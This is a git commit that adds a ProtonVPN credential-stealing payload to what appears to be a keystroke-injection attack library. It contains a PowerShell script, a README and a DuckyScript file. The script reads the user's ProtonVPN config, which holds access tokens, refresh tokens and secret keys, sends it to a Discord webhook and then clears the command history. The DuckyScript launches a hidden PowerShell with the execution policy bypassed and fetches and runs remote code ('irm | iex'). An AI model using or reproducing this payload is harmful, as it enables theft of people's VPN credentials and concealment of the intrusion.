Merge pull request #159 from aleff-github/patch-26

ProtonVPN-config-to-Discord-Exfiltration
2023-06-12 14:25:05 -04:00 · 2023-06-12 14:25:05 -04:00 · fdebc7aae0
parent 64585e83bc c0cd28c287
commit fdebc7aae0
3 changed files with 117 additions and 0 deletions
--- a/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1
+++ b/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1
@ -0,0 +1,37 @@
+$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config"
+
+$Content = Get-Content -Path $Path
+
+$text = $Path + $Content
+
+# Discord Connection
+$hookurl = "$discord"
+
+# Loop for Discord
+$ConstantLimitForRestMethod = 1999
+$TMP_Body = @{
+	'username' = $env:username
+	'content' = ""
+}
+ for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
+	try {
+		$TMP_Body = @{
+  			'username' = $env:username
+  			'content' = $text.Substring($i, $ConstantLimitForRestMethod)
+		}
+	} catch [ArgumentOutOfRangeException] {
+		if($text.Length-$i -gt 0){
+			$TMP_Body = @{
+  			'username' = $env:username
+  			'content' = $text.Substring($i, $text.Length-$i)
+			}
+		} else {
+			break
+		}
+	}
+	Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json)
+}
+
+
+# Clear the PowerShell command history
+Clear-History
--- a/payloads/library/exfiltration/ProtonVPN-config/README.md
+++ b/payloads/library/exfiltration/ProtonVPN-config/README.md
@ -0,0 +1,37 @@
+# ProtonVPN config file ✅
+
+A script used to stole target ProtonVPN config file.
+
+**Category**: Credentials, Exfiltration
+
+## Description
+
+This script will stole target ProtonVPN config file.
+
+Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+In the config file you can find a lot information about the user like:
+- UserUid 
+- UserAccessToken
+- UserRefreshToken
+- UserAuthenticationPublicKey
+- UserAuthenticationSecretKey
+- UserAuthenticationCertificatePem
+- UserCertificationServerPublicKey 
+- and so on...
+
+Then it cleans up traces of what you have done after.
+
+## Getting Started
+
+### Dependencies
+
+* ProtonVPN user logged at least one time
+* An internet connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+* Invoke Get-Content for get in plaintext the ProtonVPN .config content
+* Invoke-WebRequest will be entered in the Run Box to send the content
+
--- a/payloads/library/exfiltration/ProtonVPN-config/payload.txt
+++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
@ -0,0 +1,43 @@
+REM ###################################################################
+REM #                                                                 |
+REM # Title        : ProtonVPN-config-to-Discord-Exfiltration         |
+REM # Author       : Aleff                                            |
+REM # Version      : 1.0                                              |
+REM # Category     : Credentials, Exfiltration                        |
+REM # Target       : Windows 10-11                                    |
+REM #                                                                 |
+REM ###################################################################
+
+REM Title: ProtonVPN-config-to-Discord-Exfiltration
+REM Author: Aleff
+REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+REM              In the config file you can find a lot information about the user like:
+REM              - UserUid 
+REM              - UserAccessToken
+REM              - UserRefreshToken
+REM              - UserAuthenticationPublicKey
+REM              - UserAuthenticationSecretKey
+REM              - UserAuthenticationCertificatePem
+REM              - UserCertificationServerPublicKey 
+REM              - and so on...
+REM              Then it cleans up traces of what you have done after.
+REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
+REM Version: 1.0
+REM Category: Credentials, Exfiltration
+REM Requirements: ProtonVPN user logged at least one time and internet connection
+REM 
+
+REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
+DEFINE WEBHOOK example.com
+
+DELAY 2000
+GUI r
+DELAY 250
+DELETE
+STRING powershell -w h -ep bypass $discord='
+STRING WEBHOOK
+
+REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
+DEFINE PAYLOAD example.com
+STRING ';irm PAYLOAD | iex
+ENTER